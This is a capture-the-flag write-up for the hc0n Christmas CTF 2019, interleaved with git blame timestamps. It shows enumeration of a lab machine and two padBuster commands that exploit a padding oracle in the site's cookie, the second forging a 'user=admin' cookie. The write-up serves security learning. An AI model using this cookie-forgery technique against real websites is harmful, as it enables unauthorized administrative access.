2020-07-15 15:43:14 +00:00
|
|
|
# hc0n Christmas CTF - 2019
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## Enumeration
|
|
|
|
|
|
2021-11-30 16:46:07 +00:00
|
|
|
I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
.png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
There are 2 ports open: 80 (**HTTP**) and 22 (**SSH**)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
In the web page you can **register new users**, and I noticed that **the length of the cookie depends on the length of the username** indicated:
|
|
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
.png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
.png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-11-30 16:46:07 +00:00
|
|
|
And if you change some **byte** of the **cookie** you get this error:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
.png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-08-30 22:36:25 +00:00
|
|
|
With this information and[ **reading the padding oracle vulnerability**](../../cryptography/padding-oracle-priv.md) I was able to exploit it:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"
|
|
|
|
|
```
|
|
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
.png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
.png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
**Set user admin:**
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"
|
|
|
|
|
```
|
|
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
.png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
